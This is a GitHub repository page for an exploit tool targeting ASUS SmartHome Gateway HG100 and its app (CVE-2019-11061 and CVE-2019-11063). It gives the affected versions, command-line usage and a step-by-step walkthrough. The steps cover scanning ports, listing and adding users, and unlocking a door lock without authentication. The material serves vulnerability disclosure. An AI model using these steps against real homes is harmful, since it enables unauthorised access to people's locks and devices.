Skip to content
ASUS SmartHome Exploit for CVE-2019-11061 and CVE-2019-11063
Python
Branch: master
Clone or download
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
images add description Apr 1, 2019
.gitignore Initial commit Mar 29, 2019
DeviceInfo.py cmd done Apr 1, 2019
README.md add Affected products description Aug 27, 2019
SmartHomeExploit.py add https description Jul 25, 2019
__init__.py scan done Mar 29, 2019
exploit.py https support May 26, 2019

README.md

ASUS-SmartHome-Exploit

CVE IDs

CVE-2019-11061 : Broken access control in HG100

Affected products : ASUS SmartHome Gateway HG100 Firmware version < 4.00.09

CVE-2019-11063 : Broken access control in SmartHome app

Affected products : ASUS SmartHome Android APP version < 3.0.45_190701

Description

If the attacker is on the same internal network as the HG100 or a mobile device with the companion APP(android or iPhone). The attacker can send control requests to them.

The attacker then does not need any authentication to do the following:
1. Get all user names that have been added to the HG100.
2. Get all devices information under the SmartHome Gateway(HG100).
3. Control all controllable devices (e.g. DoorLock, Meter Plug ...) under the SmartHome Gateway.
The following need password (4 to 6 digits, default: "0000") :
1. Add users to HG100.

Exploit usage:

scan exploitable port :

usage: exploit.py scan [-h] [-v] target_ip

scan exploitable port

positional arguments:
  target_ip   scan ip

optional arguments:
  -h, --help  show this help message and exit
  -v          show account email list

send command to target :

usage: exploit.py cmd [-h]
                      (-u | -l | -s device_id | -c device_id status | -a username)
                      [--user username] [--new-user username] [-v]
                      target

send command to target

positional arguments:
  target                <target-ip>:<port>

optional arguments:
  -h, --help            show this help message and exit
  -u, --list-user       list all user in device
  -l, --list-device     list all device status
  -s device_id, --device-status device_id
                        list device status
  -c device_id status, --device-control device_id status
                        control device status
  -a username, --add-user username
                        add a user to device
  --user username       assign user for cmd
  --new-user username   create a new user for cmd
  -v                    show account email list

Note: 2019/5/15 - ASUS release update for SmartHome APP(3.0.42_190515) and Gateway(4.00.06). And added SSL to HTTP service. But this vulnerability still exists. For this update, you need to specify protocal when using the "cmd" argument. For example:
$ ./exploit.py cmd https://10.42.50.166:8083 -l

Use example:

Step1:

Scan mobile device (installed the companion APP for android or iPhone) exploitable port :
app port P.S. The -v option will list the users that have been added to the HG100.

or

Scan HG100 exploitable port :
HG100 port

Step2:

Get all user that have been added to the HG100: list user

or add a new one: add user

Note: use https://10.42.50.166:8083 for "cmd" argument.
For example:

$ ./exploit.py cmd https://10.42.50.166:8083 -u

Step3:

Get all devices information under the SmartHome Gateway: list device P.S. If the --user option is not set, the first user in HG100 will be selected automatically. (Because no password is needed)

Compare with app:


Step4:

Control (unlock) the DoorLock. ctrl device P.S. the value 1028 get from -l option(step3).

Result:

You can’t perform that action at this time.